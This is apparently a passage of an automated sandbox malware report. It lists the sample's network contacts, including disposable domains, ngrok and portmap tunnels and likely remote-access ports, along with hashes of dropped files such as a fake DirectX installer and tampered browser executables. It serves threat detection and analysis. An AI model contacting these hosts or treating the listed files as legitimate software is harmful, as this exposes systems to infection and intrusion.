| US | 8.8.8.8:53 | shelterryujxo.shop | udp |
| US | 8.8.8.8:53 | chequedxmznp.shop | udp |
| US | 8.8.8.8:53 | illnesmunxkza.shop | udp |
| US | 8.8.8.8:53 | triallyforwhgh.shop | udp |
| N/A | 192.168.100.18:4782 | tcp | |
| US | 8.8.8.8:53 | shootydowtqosm.shop | udp |
| US | 8.8.8.8:53 | faceddullinhs.shop | udp |
| US | 8.8.8.8:53 | ammycanedpors.shop | udp |
| GB | 2.22.99.85:443 | steamcommunity.com | tcp |
| US | 64.190.113.79:443 | tcp | |
| IR | 2.177.40.206:40500 | udp | |
| US | 137.184.144.245:4782 | tcp | |
| US | 8.8.8.8:53 | 206.40.177.2.in-addr.arpa | udp |
| DE | 193.161.193.99:37245 | dez345-37245.portmap.host | tcp |
| US | 8.8.8.8:53 | 0.tcp.eu.ngrok.io | udp |
| DE | 18.153.198.123:15174 | 0.tcp.eu.ngrok.io | tcp |
| US | 64.190.113.79:443 | tcp | |
| US | 20.83.148.22:80 | 170.114.78.80 | tcp |
| YE | 46.35.79.193:40500 | tcp | |
| US | 8.8.8.8:53 | 123.198.153.18.in-addr.arpa | udp |
| US | 8.8.8.8:53 | docs.google.com | udp |
| GB | 142.250.187.206:443 | docs.google.com | tcp |
| US | 8.8.8.8:53 | c.pki.goog | udp |
| US | 8.8.8.8:53 | 206.187.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 3.200.250.142.in-addr.arpa | udp |
| GB | 142.250.200.3:80 | c.pki.goog | tcp |
| US | 8.8.8.8:53 | thizx13vt.top | udp |
| US | 8.8.8.8:53 | o.pki.goog | udp |
| GB | 142.250.200.3:80 | o.pki.goog | tcp |
| HU | 38.180.109.140:20007 | tcp | |
| US | 64.190.113.79:443 | tcp | |
| US | 8.8.8.8:53 | drive.usercontent.google.com | udp |
| GB | 142.250.179.225:443 | drive.usercontent.google.com | tcp |
| US | 8.8.8.8:53 | 225.179.250.142.in-addr.arpa | udp |
| IR | 2.191.61.218:40500 | udp | |
| US | 8.8.8.8:53 | 218.61.191.2.in-addr.arpa | udp |
| FR | 176.150.119.15:56001 | tcp | |
| DE | 18.153.198.123:15174 | 0.tcp.eu.ngrok.io | tcp |
| US | 8.8.8.8:53 | 0.tcp.in.ngrok.io | udp |
| US | 64.190.113.79:443 | tcp | |
| IN | 35.154.189.194:15792 | 0.tcp.in.ngrok.io | tcp |
| DE | 193.161.193.99:37245 | dez345-37245.portmap.host | tcp |
| US | 64.190.113.79:443 | tcp | |
| US | 8.8.8.8:53 | thizx13vt.top | udp |
| IR | 2.189.31.47:40500 | udp | |
| US | 8.8.8.8:53 | 47.31.189.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | mundoparachicas.space | udp |
| US | 172.67.199.148:443 | mundoparachicas.space | tcp |
| US | 64.190.113.79:443 | tcp | |
| DE | 18.153.198.123:15174 | 0.tcp.eu.ngrok.io | tcp |
| US | 8.8.8.8:53 | 148.199.67.172.in-addr.arpa | udp |
| HU | 38.180.109.140:20007 | tcp | |
| IN | 35.154.189.194:15792 | 0.tcp.in.ngrok.io | tcp |
| DE | 193.161.193.99:37245 | dez345-37245.portmap.host | tcp |
| US | 64.190.113.79:443 | tcp | |
| US | 20.83.148.22:80 | tcp | |
| IR | 46.167.149.255:40500 | udp | |
| US | 8.8.8.8:53 | 255.149.167.46.in-addr.arpa | udp |
| US | 8.8.8.8:53 | thizx13vt.top | udp |
| US | 64.190.113.79:443 | tcp | |
| DE | 18.153.198.123:15174 | 0.tcp.eu.ngrok.io | tcp |
| US | 64.190.113.79:443 | tcp | |
| DE | 193.161.193.99:37245 | dez345-37245.portmap.host | tcp |
| HU | 38.180.109.140:20007 | tcp | |
| UZ | 90.156.167.42:40500 | udp | |
| IN | 35.154.189.194:15792 | 0.tcp.in.ngrok.io | tcp |
| US | 8.8.8.8:53 | 42.167.156.90.in-addr.arpa | udp |
| US | 64.190.113.79:443 | tcp | |
| DE | 18.153.198.123:15174 | 0.tcp.eu.ngrok.io | tcp |
| N/A | 192.168.100.18:4782 | tcp | |
| US | 8.8.8.8:53 | thizx13vt.top | udp |
| US | 64.190.113.79:443 | tcp | |
| US | 137.184.144.245:4782 | tcp | |
| DE | 193.161.193.99:37245 | dez345-37245.portmap.host | tcp |
| DE | 18.153.198.123:15174 | 0.tcp.eu.ngrok.io | tcp |
| US | 64.190.113.79:443 | tcp | |
| HU | 38.180.109.140:20007 | tcp | |
| UZ | 90.156.163.98:40500 | tcp | |
| US | 64.190.113.79:443 | tcp | |
| US | 8.8.8.8:53 | thizx13vt.top | udp |
| RU | 178.206.158.183:40500 | udp | |
| US | 8.8.8.8:53 | 183.158.206.178.in-addr.arpa | udp |
| CN | 106.42.31.65:8088 | tcp | |
| FR | 176.150.119.15:56001 | tcp | |
| DE | 18.153.198.123:15174 | 0.tcp.eu.ngrok.io | tcp |
| US | 64.190.113.79:443 | tcp | |
| IR | 2.180.218.158:40500 | udp | |
| DE | 193.161.193.99:37245 | dez345-37245.portmap.host | tcp |
| NL | 91.92.240.41:80 | tcp | |
| US | 8.8.8.8:53 | 158.218.180.2.in-addr.arpa | udp |
| US | 64.190.113.79:443 | tcp | |
| IN | 35.154.189.194:15792 | 0.tcp.in.ngrok.io | tcp |
| US | 8.8.8.8:53 | thizx13vt.top | udp |
| DE | 18.153.198.123:15174 | 0.tcp.eu.ngrok.io | tcp |
| US | 64.190.113.79:443 | tcp | |
| US | 20.83.148.22:80 | tcp | |
| UZ | 213.230.91.87:40500 | udp | |
| US | 64.190.113.79:443 | tcp | |
| US | 8.8.8.8:53 | 87.91.230.213.in-addr.arpa | udp |
| BG | 87.120.126.5:80 | 87.120.126.5 | tcp |
| DE | 193.161.193.99:37245 | dez345-37245.portmap.host | tcp |
| US | 20.83.148.22:80 | tcp | |
| HU | 38.180.109.140:20007 | tcp | |
| US | 8.8.8.8:53 | 5.126.120.87.in-addr.arpa | udp |
| US | 64.190.113.79:443 | tcp | |
| US | 8.8.8.8:53 | thizx13vt.top | udp |
| DE | 18.153.198.123:15174 | 0.tcp.eu.ngrok.io | tcp |
| US | 64.190.113.79:443 | tcp | |
| MX | 189.141.139.39:40500 | udp | |
| IN | 35.154.189.194:15792 | 0.tcp.in.ngrok.io | tcp |
| US | 8.8.8.8:53 | 39.139.141.189.in-addr.arpa | udp |
| US | 64.190.113.79:443 | tcp | |
| DE | 193.161.193.99:37245 | dez345-37245.portmap.host | tcp |
| DE | 18.153.198.123:15174 | 0.tcp.eu.ngrok.io | tcp |
| US | 8.8.8.8:53 | thizx13vt.top | udp |
| N/A | 192.168.100.18:4782 | tcp | |
| RU | 185.215.113.16:80 | 185.215.113.16 | tcp |
| US | 64.190.113.79:443 | tcp | |
| US | 137.184.144.245:4782 | tcp | |
| HU | 38.180.109.140:20007 | tcp | |
| RU | 185.215.113.206:80 | 185.215.113.206 | tcp |
| IR | 2.181.218.207:40500 | udp | |
| US | 8.8.8.8:53 | property-imper.sbs | udp |
| US | 8.8.8.8:53 | frogs-severz.sbs | udp |
| US | 8.8.8.8:53 | occupy-blushi.sbs | udp |
| US | 8.8.8.8:53 | 207.218.181.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | blade-govern.sbs | udp |
| US | 172.67.153.209:443 | blade-govern.sbs | tcp |
| US | 64.190.113.79:443 | tcp | |
| US | 8.8.8.8:53 | story-tense-faz.sbs | udp |
| US | 104.21.1.25:443 | story-tense-faz.sbs | tcp |
| US | 8.8.8.8:53 | 209.153.67.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | leg-sate-boat.sbs | udp |
| CN | 183.57.21.131:8095 | tcp | |
| US | 8.8.8.8:53 | disobey-curly.sbs | udp |
| US | 172.67.223.140:443 | disobey-curly.sbs | tcp |
| US | 8.8.8.8:53 | thizx13vt.top | udp |
| US | 8.8.8.8:53 | motion-treesz.sbs | udp |
| US | 172.67.141.76:443 | motion-treesz.sbs | tcp |
| US | 8.8.8.8:53 | powerful-avoids.sbs | udp |
| US | 172.67.187.4:443 | powerful-avoids.sbs | tcp |
| DE | 193.161.193.99:37245 | dez345-37245.portmap.host | tcp |
| DE | 18.153.198.123:15174 | 0.tcp.eu.ngrok.io | tcp |
| US | 8.8.8.8:53 | 140.223.67.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 76.141.67.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | steamcommunity.com | udp |
| GB | 2.22.99.85:443 | steamcommunity.com | tcp |
| US | 172.67.160.80:443 | marshal-zhukov.com | tcp |
| US | 64.190.113.79:443 | tcp | |
| IR | 46.248.34.12:40500 | tcp | |
| IR | 2.179.117.33:40500 | udp | |
| US | 64.190.113.79:443 | tcp | |
| HU | 38.180.109.140:20007 | tcp | |
| FR | 176.150.119.15:56001 | tcp | |
| IN | 35.154.189.194:15792 | 0.tcp.in.ngrok.io | tcp |
| DE | 18.153.198.123:15174 | 0.tcp.eu.ngrok.io | tcp |
| NL | 91.92.240.41:80 | tcp | |
| US | 64.190.113.79:443 | tcp | |
| US | 8.8.8.8:53 | thizx13vt.top | udp |
| DE | 193.161.193.99:37245 | dez345-37245.portmap.host | tcp |
| IR | 195.181.23.242:40500 | udp | |
| US | 8.8.8.8:53 | 242.23.181.195.in-addr.arpa | udp |
| US | 64.190.113.79:443 | tcp | |
| US | 64.190.113.79:443 | tcp | |
| US | 8.8.8.8:53 | 0.tcp.eu.ngrok.io | udp |
| DE | 52.57.120.10:15174 | 0.tcp.eu.ngrok.io | tcp |
| US | 20.83.148.22:80 | tcp | |
| DE | 193.161.193.99:37245 | dez345-37245.portmap.host | tcp |
| HU | 38.180.109.140:20007 | tcp | |
| SY | 5.134.251.133:40500 | udp | |
| US | 8.8.8.8:53 | thizx13vt.top | udp |
| US | 8.8.8.8:53 | 133.251.134.5.in-addr.arpa | udp |
| US | 64.190.113.79:443 | tcp | |
| US | 8.8.8.8:53 | 0.tcp.in.ngrok.io | udp |
| IN | 3.6.231.193:15792 | 0.tcp.in.ngrok.io | tcp |
Files
memory/1808-0-0x0000000074F8E000-0x0000000074F8F000-memory.dmp
memory/1808-1-0x0000000000210000-0x0000000000218000-memory.dmp
memory/1808-2-0x0000000004AB0000-0x0000000004B4C000-memory.dmp
memory/1808-3-0x0000000074F80000-0x0000000075731000-memory.dmp
memory/1808-4-0x0000000074F8E000-0x0000000074F8F000-memory.dmp
memory/1808-5-0x0000000074F80000-0x0000000075731000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\Files\dxwebsetup.exe
| MD5 | 2cca969570717a0af4f2531eb69cc7c9 |
| SHA1 | 692243584cca03a41bab00ae6113e6e7a3d14863 |
| SHA256 | a9971d2f3b8c1611723938a3ea6578c27f31049d3297e607cf0ee6927a4a26c7 |
| SHA512 | 3a2257abdadb2ef34a8171a3c3965b8e6bba955dcda0ca837a635736da0f17795e71ff93d8f4421a51ac9778d10dce1f3c28a62149d05ccf07ae75934fff5670 |
C:\Users\Admin\AppData\Local\Temp\3582-490\dxwebsetup.exe
| MD5 | 2cbd6ad183914a0c554f0739069e77d7 |
| SHA1 | 7bf35f2afca666078db35ca95130beb2e3782212 |
| SHA256 | 2cf71d098c608c56e07f4655855a886c3102553f648df88458df616b26fd612f |
| SHA512 | ff1af2d2a883865f2412dddcd68006d1907a719fe833319c833f897c93ee750bac494c0991170dc1cf726b3f0406707daa361d06568cd610eeb4ed1d9c0fbb10 |
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe
| MD5 | ac3a5f7be8cd13a863b50ab5fe00b71c |
| SHA1 | eee417cd92e263b84dd3b5dcc2b4b463fe6e84d9 |
| SHA256 | 8f5e89298e3dc2e22d47515900c37cca4ee121c5ba06a6d962d40ad6e1a595da |
| SHA512 | c8bbe791373dad681f0ac9f5ab538119bde685d4f901f5db085c73163fc2e868972b2de60e72ccd44f745f1fd88fcde2e27f32302d8cbd3c1f43e6e657c79fba |
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\dxwsetup.inf
| MD5 | ad8982eaa02c7ad4d7cdcbc248caa941 |
| SHA1 | 4ccd8e038d73a5361d754c7598ed238fc040d16b |
| SHA256 | d63c35e9b43eb0f28ffc28f61c9c9a306da9c9de3386770a7eb19faa44dbfc00 |
| SHA512 | 5c805d78bafff06c36b5df6286709ddf2d36808280f92e62dc4c285edd9176195a764d5cf0bb000da53ca8bbf66ddd61d852e4259e3113f6529e2d7bdbdd6e28 |
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\dsetup.dll
| MD5 | 984cad22fa542a08c5d22941b888d8dc |
| SHA1 | 3e3522e7f3af329f2235b0f0850d664d5377b3cd |
| SHA256 | 57bc22850bb8e0bcc511a9b54cd3da18eec61f3088940c07d63b9b74e7fe2308 |
| SHA512 | 8ef171218b331f0591a4b2a5e68dcbae98f5891518ce877f1d8d1769c59c0f4ddae43cc43da6606975078f889c832f0666484db9e047782e7a0ae4a2d41f5bef |
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\dsetup32.dll
| MD5 | a5412a144f63d639b47fcc1ba68cb029 |
| SHA1 | 81bd5f1c99b22c0266f3f59959dfb4ea023be47e |
| SHA256 | 8a011da043a4b81e2b3d41a332e0ff23a65d546bd7636e8bc74885e8746927d6 |
| SHA512 | 2679a4cb690e8d709cb5e57b59315d22f69f91efa6c4ee841943751c882b0c0457fd4a3376ac3832c757c6dfaffb7d844909c5665b86a95339af586097ee0405 |
C:\Users\Admin\AppData\Local\Temp\Files\client.exe
| MD5 | 29de30606fa3cd9024d87066016d0351 |
| SHA1 | 32af15b435a5f26655947612fe30da89b5a29370 |
| SHA256 | 56a35f9bcb582449d44a4bed4fa36dcb140f04961f0f1fec1d96385569f72cac |
| SHA512 | 6fbe73cddab8a943d1ce060da1a3d26832616aefad76fe3b1dbd71991e4412a591133aee34df6a467a15acce8c587ea1420ca2f0dc4c8c77d54b8712a00a9355 |
C:\Windows\svchost.com
| MD5 | ead203cb6aa81e842d32f43fab32c493 |
| SHA1 | 124b348eb437e838674f5b9de4e98da20c17ef60 |
| SHA256 | c6845f33531b0405b1f2b248aa2e9c429bb074fd32589fa55d4429ce2dfc96ef |
| SHA512 | a60434cb1ed67867613951ca4a09c8c3b7ba34ca7d03e16399eb96b771d41f96d7efdcd39f6e35cc1e341f273d3303584c3c981943e3e2d6bc016471f51cfc5d |
memory/3048-81-0x0000000000550000-0x0000000000874000-memory.dmp
C:\PROGRA~2\COMMON~1\Oracle\Java\javapath\javaw.exe
| MD5 | 892cf4fc5398e07bf652c50ef2aa3b88 |
| SHA1 | c399e55756b23938057a0ecae597bd9dbe481866 |
| SHA256 | e2262c798729169f697e6c30e5211cde604fd8b14769311ff4ea81abba8c2781 |
| SHA512 | f16a9e4b1150098c5936ec6107c36d47246dafd5a43e9f4ad9a31ecab69cc789c768691fa23a1440fae7f6e93e8e62566b5c86f7ed6bb4cfe26368149ea8c167 |
C:\PROGRA~2\Google\Update\DISABL~1.EXE
| MD5 | 7429ce42ac211cd3aa986faad186cedd |
| SHA1 | b61a57f0f99cfd702be0fbafcb77e9f911223fac |
| SHA256 | d608c05409ac4bd05d8e0702fcf66dfae5f4f38cbae13406842fa5504f4d616f |
| SHA512 | ee4456877d6d881d9904013aabecb9f2daf6fc0ec7a7c9251e77396b66a7f5a577fe8544e64e2bb7464db429db56a3fe47c183a81d40cc869d01be573ab5e4c1 |
C:\PROGRA~2\MICROS~1\EDGEUP~1\13147~1.37\MI9C33~1.EXE
| MD5 | 1e09e65111ab34cb84f7855d3cddc680 |
| SHA1 | f9f852104b46d99cc7f57a6f40d5db2090be04c0 |
| SHA256 | 8f5c7c8e0258a5caa37637b2fa36f3bd87569a97b5c1ecf40dab50e7255fcf9c |
| SHA512 | 003176cb9dd7668b1b40e4d60d86d57c1a9ec4d873382aab781b31c8c89f0e388f3d406963f159412e2828d0be9f6daea146a252d8ee47281dda01123c9e7ace |
C:\Users\Admin\AppData\Roaming\SubDir\Client.exe
| MD5 | ef725bbc6052f8751afb1e3ca0ae58cc |
| SHA1 | d76a87278260f658bb7fa465ceae9fed13b72358 |
| SHA256 | 4a720462481db2dfdd1213396de56329f4b527f7c8a6de8782f03c86657b3f68 |
| SHA512 | 5b6de41eb9efb429451d6d55e3ce122f9271dd8bf0c87a9f700061f414d10d01758f6e78f11c6909eb33d10612b7f741425863e7b0d18c6bc3d8032d82eb99c0 |
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\Client.exe.log
| MD5 | b08c36ce99a5ed11891ef6fc6d8647e9 |
| SHA1 | db95af417857221948eb1882e60f98ab2914bf1d |
| SHA256 | cc9248a177495f45ec70b86c34fc5746c56730af36ace98ac7eb365dbafda674 |
| SHA512 | 07e62581eace395b0a9699d727761648103180c21155d84ea09140f9e1c9690705c419118545aa67a564334bbde32710225fe3aa92b0b4b4210cb91f0058b1ea |
memory/1352-216-0x0000000000400000-0x000000000041B000-memory.dmp
C:\Windows\directx.sys
| MD5 | d41d8cd98f00b204e9800998ecf8427e |
| SHA1 | da39a3ee5e6b4b0d3255bfef95601890afd80709 |
| SHA256 | e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 |
| SHA512 | cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e |
C:\PROGRA~3\MICROS~1\CLICKT~1\{9AC08~1\INTEGR~1.EXE
| MD5 | 63dc05e27a0b43bf25f151751b481b8c |
| SHA1 | b20321483dac62bce0aa0cef1d193d247747e189 |
| SHA256 | 7d607fb69c69a72a5bf4305599279f46318312ce1082b6a34ac9100b8c7762ce |
| SHA512 | 374d705704d456cc5f9f79b7f465f6ec7c775dc43001c840e9d6efbbdef20926ed1fa97f8a9b1e73161e17f72520b96c05fa58ac86b3945208b405f9166e7ba3 |
C:\PROGRA~3\PACKAG~1\{33D1F~1\VCREDI~1.EXE
| MD5 | 86749cd13537a694795be5d87ef7106d |
| SHA1 | 538030845680a8be8219618daee29e368dc1e06c |
| SHA256 | 8c35dcc975a5c7c687686a3970306452476d17a89787bc5bd3bf21b9de0d36a5 |
| SHA512 | 7b6ae20515fb6b13701df422cbb0844d26c8a98087b2758427781f0bf11eb9ec5da029096e42960bf99ddd3d4f817db6e29ac172039110df6ea92547d331db4c |
C:\PROGRA~3\PACKAG~1\{61087~1\VCREDI~1.EXE
| MD5 | 9597098cfbc45fae685d9480d135ed13 |
| SHA1 | 84401f03a7942a7e4fcd26e4414b227edd9b0f09 |
| SHA256 | 45966655baaed42df92cd6d8094b4172c0e7a0320528b59cf63fca7c25d66e9c |
| SHA512 | 16afbdffe4b4b2e54b4cc96fe74e49ca367dea50752321ddf334756519812ba8ce147ef5459e421dc42e103bc3456aab1d185588cc86b35fa2315ac86b2a0164 |
C:\PROGRA~3\PACKAG~1\{57A73~1\VC_RED~1.EXE
| MD5 | 9c10a5ec52c145d340df7eafdb69c478 |
| SHA1 | 57f3d99e41d123ad5f185fc21454367a7285db42 |
| SHA256 | ccf37e88447a7afdb0ba4351b8c5606dbb05b984fb133194d71bcc00d7be4e36 |
| SHA512 | 2704cfd1a708bfca6db7c52467d3abf0b09313db0cdd1ea8e5d48504c8240c4bf24e677f17c5df9e3ac1f6a678e0328e73e951dc4481f35027cb03b2966dc38f |
C:\PROGRA~3\PACKAG~1\{4D8DC~1\VC_RED~1.EXE
| MD5 | 97510a7d9bf0811a6ea89fad85a9f3f3 |
| SHA1 | 2ac0c49b66a92789be65580a38ae9798237711db |
| SHA256 | c48abbc29405559e68cc9f8fc6d218aa317a9d0023839c7846ca509c1f563fea |
| SHA512 | 2a93e2a3bd187fdde160f87ef777ccd1d1c398d547b7c869e6b64469b9418ad04d887cdfe94af7407476377bf2d009f576de3935c025b7aefbab26fbcd8f90fb |
C:\Users\Admin\AppData\Local\Temp\Files\plswork.exe
| MD5 | 71685fb1a3701f1e27e48ba3e3ce9530 |
| SHA1 | f460a9ecc7e35b4691532bc6c647dbe3973a51ca |
| SHA256 | 6600b4938a679ecd93d6149fb3f8fe74c8b347106de55a4853a76ae7a204950e |
| SHA512 | 3a7505c3faacf6f3e113570545767757d2db5aa342023a4eea27e49e4d632a0064a957c6b07f950e727dd71b8262b768626521cf1d1fbb195fd36d7db7bf5c5a |
C:\PROGRA~2\MOZILL~1\UNINST~1.EXE
| MD5 | 3cfd732cd6a3399c411739a8b75b5ae2 |
| SHA1 | 242b02177cbec61819c11c35c903a2994e83ae10 |
| SHA256 | e90c627265bc799db00828179a5d76717a577086755043ba223a9ac78510a2ff |
| SHA512 | b7b61c5f9dab2c6a4e5157a934db5bb26727418698fa44f05fbb9af38cd93dee0261f3f28700bc5cb21e8947a542c3ee6166375ea262c19d41e84c68b0d0fc72 |
C:\PROGRA~2\MOZILL~1\MAINTE~1.EXE
| MD5 | d84f63a0bf5eff0c8c491f69b81d1a36 |
| SHA1 | 17c7d7ae90e571e99f1b1685872f91c04ee76e85 |
| SHA256 | 06d363997722b0e3c4787f72ca61cb2a8ad59ea7ba8a9d14eafa8a8a550687a2 |
| SHA512 | 865aab84cfe40604ffd013d8517a538eb1322b90372d236821c0e39e285a20bdad755ddff8d59d8af47a9b10b6c77947abc9148761e75892c617db8503b0ef6e |
C:\PROGRA~2\MICROS~1\EDGEUP~1\13147~1.37\MIA062~1.EXE
| MD5 | 4754ef85cf5992c484e75c0859cd0c12 |
| SHA1 | 199b550e52f74d5a9932b1210979bc79a9b8f6fd |
| SHA256 | da6de758d909ff5b7fb150a4a6a6b9774951aa2bd7c93966ea8951647386c330 |
| SHA512 | 22c557807b81aac91c65643abb73f212d13f7c4504b6bb14e82bd9cf91319f2daadafa67425d91fa95f1d39c3700684f928e7d68468cb192c4c0be71b9f9b5ab |
C:\PROGRA~2\MICROS~1\EDGEUP~1\13147~1.37\MID1AD~1.EXE
| MD5 | 4f197c71bb5b8880da17b80a5b59dd04 |
| SHA1 | c3d4b54f218768e268c9114aa9cdaf36a48803cd |
| SHA256 | a1a0bf09839e6175e5508271774c6d94f4eb2130c914ea7666c1ecaf1a6fde47 |
| SHA512 | e6104ade74dc18e05be756e2a287b9940cdc98150ddd7c562b61282d57070e1d7272316469f1e1b294d3dfbcf191c2692de0d45a2fae59e73c4c039d80f3e002 |
C:\PROGRA~2\MICROS~1\EDGEUP~1\13147~1.37\MICROS~4.EXE
| MD5 | da18586b25e72ff40c0f24da690a2edc |
| SHA1 | 27a388f3cdcfa7357f971b5c4411ea5aa1b9e5f5 |
| SHA256 | 67f6e8f14bcf0e6d570c1f4ac5a1bb80a4e1470b5bad5a7ee85689c476597d8e |
| SHA512 | 3512820a9d37b61f77a79b2d4d3f6aec9ef53dbf81071bee16f5dcc8173393a1cd1bffe9f7f39467b72f9c9271a78e42078e68598934188d9df0b887f2edc5ab |
C:\PROGRA~2\MICROS~1\EDGEUP~1\13147~1.37\MICROS~3.EXE
| MD5 | e6aecae25bdec91e9bf8c8b729a45918 |
| SHA1 | 3097cddcb7d2a7512b8df9f5637d9bb52f6175ed |
| SHA256 | a60e32baf0c481d6b9db3b84c205716fe2e588cb5089c3d0e4e942e453bf086d |
| SHA512 | c9a6add86a2907f21c5049613fd8300800e4a949a943feea9ab36a271596343328bf0856e3d8dc4784b1c8357e01c3702761b8d9a3170ebd279dc4e1f1cacb01 |
C:\PROGRA~2\MICROS~1\EDGEUP~1\13147~1.37\MICROS~2.EXE
| MD5 | 5d656c152b22ddd4f875306ca928243a |
| SHA1 | 177ff847aa898afa1b786077ae87b5ae0c7687c7 |
| SHA256 | 4d87b0eb331443b473c90650d31b893d00373ff88dcbcb3747f494407799af69 |
| SHA512 | d5e50ee909ea06e69fc0d9999c6d142f9154e6f63462312b4e950cf6e26a7d395dbb50c8e2a8c4f4e1cfb7b2c6ae8ad19e3b7c204c20e7557daa1a0deb454160 |
C:\PROGRA~2\MICROS~1\EDGEUP~1\13147~1.37\MICROS~1.EXE
| MD5 | c7f7803a2032d0d942340cfebba0a42c |
| SHA1 | 578062d0707e753ab58875fb3a52c23e6fe2adf6 |
| SHA256 | 0f201a8142c5a8adc36d2a177dd8d430eef2b05cff0e4faefb52440e823b54bb |
| SHA512 | 48e3e1eb3a33c1b8c20411209d8ed261c00798393f5fdd691d3fa0abed2849d8eb241bedcbeefddfebbec292c7abd254023e25df77c85b46000fe63a7324172b |
C:\PROGRA~2\MICROS~1\Edge\APPLIC~1\PWAHEL~1.EXE
| MD5 | 5c78384d8eb1f6cb8cb23d515cfe7c98 |
| SHA1 | b732ab6c3fbf2ded8a4d6c8962554d119f59082e |
| SHA256 | 9abd7f0aa942ee6b263cdc4b32a4110ddb95e43ad411190f0ea48c0064884564 |
| SHA512 | 99324af5f8fb70a9d01f97d845a4c6999053d6567ba5b80830a843a1634b02eaf3c0c04ced924cf1b1be9b4d1dbbcb95538385f7f85ad84d3eaaa6dcdebcc8a6 |
C:\PROGRA~2\MICROS~1\Edge\APPLIC~1\MSEDGE~1.EXE
| MD5 | a5d9eaa7d52bffc494a5f58203c6c1b5 |
| SHA1 | 97928ba7b61b46a1a77a38445679d040ffca7cc8 |
| SHA256 | 34b8662d38e7d3d6394fa6c965d943d2c82ea06ba9d7a0af4f8e0571fb5a9c48 |
| SHA512 | b6fdc8389bb4d736d608600469be6a4b0452aa3ea082f9a0791022a14c02b8fb7dcd62df133b0518e91283094eaba2be9318316f72d2c4aae6286d3e8686e787 |
C:\PROGRA~2\MICROS~1\Edge\APPLIC~1\msedge.exe
| MD5 | 5119e350591269f44f732b470024bb7c |
| SHA1 | 4ccd48e4c6ba6e162d1520760ee3063e93e2c014 |
| SHA256 | 2b3aa9642b291932ba7f9f3d85221402a9d27078f56ef0e9c6bca633616e3873 |
| SHA512 | 599b4ec673169d42a348d1117737b4ad4d7539574153df5a5c7689130c9ac5ff5cd00f3c8ec39adf32ff2b56be074081efcabb6456272c649703c3ea6cdaded4 |
C:\PROGRA~2\MICROS~1\Edge\APPLIC~1\920902~1.67\NOTIFI~1.EXE
| MD5 | 27543bab17420af611ccc3029db9465a |
| SHA1 | f0f96fd53f9695737a3fa6145bc5a6ce58227966 |
| SHA256 | 75530dc732f35cc796d19edd11ae6d6f6ef6499ddcf2e57307582b1c5299554c |
| SHA512 | a62c2dd60e1df309ec1bb48ea85184914962ba83766f29d878569549ca20fca68f304f4494702d9e5f09adedc2166e48ee0bc1f4a5d9e245c5490daf15036bea |
C:\PROGRA~2\MICROS~1\Edge\APPLIC~1\920902~1.67\MSEDGE~2.EXE
| MD5 | 11486d1d22eaacf01580e3e650f1da3f |
| SHA1 | a47a721efec08ade8456a6918c3de413a2f8c7a2 |
| SHA256 | 5e1b1daa9968ca19a58714617b7e691b6b6f34bfacaf0dcf4792c48888b1a5d3 |
| SHA512 | 5bd54e1c1308e04a769e089ab37bd9236ab97343b486b85a018f2c8ad060503c97e8bc51f911a63f9b96dd734eb7d21e0a5c447951246d972b05fafeef4633da |
C:\PROGRA~2\MICROS~1\Edge\APPLIC~1\920902~1.67\MSEDGE~3.EXE
| MD5 | eb008f1890fed6dc7d13a25ff9c35724 |
| SHA1 | 751d3b944f160b1f77c1c8852af25b65ae9d649c |
| SHA256 | a9b7b9155af49d651b092bb1665447059f7a1d0061f88fa320d4f956b9723090 |
| SHA512 | 9cfe3480f24bf8970ad5773cb9df51d132ee90ada35cbf8ec1222e09a60ae46b2ff4b96862fea19085b1c32f93c47c69f604589fa3f4af17e5d67bef893b6bf1 |
C:\PROGRA~2\MICROS~1\Edge\APPLIC~1\920902~1.67\INSTAL~1\setup.exe
| MD5 | 6ce350ad38c8f7cbe5dd8fda30d11fa1 |
| SHA1 | 4f232b8cccd031c25378b4770f85e8038e8655d8 |
| SHA256 | 06a3bb0bdd2da870bc8dc2c6b760855cea7821273ce59fc0be158149e52915ba |
| SHA512 | 4c18a112fec391f443a4ae217ac6d1850e0cfdad4b2d2cbe3f61cb01c0a1400ea6bd5c3ffe0a9978ead50e7f6cfab96ae5090bb9a611f988f1a86ccaa5d4cd4f |
C:\PROGRA~2\MICROS~1\Edge\APPLIC~1\920902~1.67\IDENTI~1.EXE
| MD5 | 301d7f5daa3b48c83df5f6b35de99982 |
| SHA1 | 17e68d91f3ec1eabde1451351cc690a1978d2cd4 |
| SHA256 | abe398284d90be5e5e78f98654b88664e2e14478f7eb3f55c5fd1c1bcf1bebee |
| SHA512 | 4a72a24dec461d116fe8324c651913273ccaa50cb036ccdacb3ae300e417cf4a64aa458869b8d2f3b4c298c59977437d11b241d08b391a481c3226954bba22e4 |
C:\PROGRA~2\MICROS~1\Edge\APPLIC~1\920902~1.67\ELEVAT~1.EXE
| MD5 | 41b1e87b538616c6020369134cbce857 |
| SHA1 | a255c7fef7ba2fc1a7c45d992270d5af023c5f67 |
| SHA256 | 08465cc139ee50a7497f8c842f74730d3a8f1a73c0b7caca95e9e6d37d3beed3 |
| SHA512 | 3a354d3577b45f6736203d5a35a2d1d543da2d1e268cefeffe6bdb723ff63c720ceb2838701144f5fec611470d77649846e0fb4770d6439f321f6b819f03e4db |
C:\PROGRA~2\MICROS~1\Edge\APPLIC~1\920902~1.67\COOKIE~1.EXE
| MD5 | 5e08d87c074f0f8e3a8e8c76c5bf92ee |
| SHA1 | f52a554a5029fb4749842b2213d4196c95d48561 |
| SHA256 | 5d548c2cc25d542f2061ed9c8e38bd5ca72bddb37dd17654346cae8a19645714 |
| SHA512 | dd98d6fa7d943604914b2e3b27e1f21a95f1fe1feb942dd6956e864da658f4fbd9d1d0cf775e79ceaae6a025aafd4e633763389c37034134bd5245969bec383e |
